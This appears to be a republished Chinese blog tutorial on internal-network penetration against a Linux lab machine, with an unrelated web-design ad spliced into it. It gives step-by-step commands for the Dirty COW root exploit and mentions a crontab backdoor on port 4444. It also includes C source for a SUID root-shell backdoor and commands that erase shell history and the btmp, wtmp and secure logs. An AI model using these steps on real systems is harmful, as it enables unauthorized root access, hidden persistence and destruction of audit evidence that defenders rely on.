內(nèi)網(wǎng)滲透之如何使用提權(quán)和后門植入

本篇內(nèi)容介紹了“內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入”的有關(guān)知識(shí),在實(shí)際案例的操作過程中,不少人都會(huì)遇到這樣的困境,接下來就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧!希望大家仔細(xì)閱讀,能夠?qū)W有所成!

工布江達(dá)網(wǎng)站建設(shè)公司成都創(chuàng)新互聯(lián),工布江達(dá)網(wǎng)站設(shè)計(jì)制作,有大型網(wǎng)站制作公司豐富經(jīng)驗(yàn)。已為工布江達(dá)1000多家提供企業(yè)網(wǎng)站建設(shè)服務(wù)。企業(yè)網(wǎng)站搭建\成都外貿(mào)網(wǎng)站建設(shè)公司要多少錢,請找那個(gè)售后服務(wù)好的工布江達(dá)做網(wǎng)站的公司定做!

linux提權(quán)和后門植入

1. 臟牛漏洞復(fù)現(xiàn)

(1) 去網(wǎng)頁上把dirty.c中的代碼復(fù)下來,制然后touch(創(chuàng)建)一個(gè).c文件,vi或者vim打開將代碼復(fù)制進(jìn)去保存

(不能在kali上直接wget下載https://github.com/FireFart/dirtycow/blob/master/dirty.c,因?yàn)檫@樣會(huì)把整個(gè)網(wǎng)頁下載下來(親測))

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

(2) 進(jìn)入shell然后從kali開的apache服務(wù)上下載

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

(3) 編譯1.c文件

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

gcc -pthread 1.c -o dirty -lcrypt                編譯.c文件

(4) 執(zhí)行文件

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

./dirty | ./dirty 自定義密碼

測試完記得將備份的password.bak(原)覆蓋過去

(5) 切換改寫過后的管理員賬戶(成功提權(quán))

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

2. crontab計(jì)劃任務(wù)

(1) vim /etc/crontab進(jìn)入編輯(前提是有管理員權(quán)限)

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

(2) 重啟后4444端口在運(yùn)行

(3) 可以控制

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

3. suid提權(quán)(前提成功提權(quán)過一次,相當(dāng)于留提權(quán)留后門)

(1) 創(chuàng)建一個(gè)suid.c的文件(由于靶機(jī)太難編輯了,所以我kali編輯完后用wget下載過去)

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

#include<stdlib.h> main(){setuid(0);system(“/bin/bash”);}

(2) 用wget下載suid

(3) gcc編譯suid.c文件

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

gcc suid.c -o suid

(4) 修改suid的權(quán)限(將文件賦予執(zhí)行該文件的以管理員身份執(zhí)行改文件)

(5) 重啟后的靶機(jī)可以直接執(zhí)行./suid進(jìn)行提權(quán)(不需要密碼)

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

4. linux痕跡清除

(1) 僅清理當(dāng)前用戶: history -c

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

(2) 使系統(tǒng)不再保存命令記錄:vi /etc/profile,找到HISTSIZE這個(gè)值,修改為0

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

刪除記錄

(3) 刪除登錄失敗記錄:echo > /var/log/btmp

(4) 刪除登錄成功記錄:echo > /var/log/wtmp (此時(shí)執(zhí)行l(wèi)ast命令就會(huì)發(fā)現(xiàn)沒有記錄)

內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入

(5) 刪除日志記錄:echo > /var/log/secure

“內(nèi)網(wǎng)滲透 之如何使用提權(quán)和后門植入”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí)可以關(guān)注創(chuàng)新互聯(lián)網(wǎng)站,小編將為大家輸出更多高質(zhì)量的實(shí)用文章!

新聞標(biāo)題:內(nèi)網(wǎng)滲透之如何使用提權(quán)和后門植入
本文路徑:http://muchs.cn/article32/joospc.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站營銷網(wǎng)站導(dǎo)航、品牌網(wǎng)站建設(shè)、網(wǎng)站策劃、建站公司

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

成都網(wǎng)頁設(shè)計(jì)公司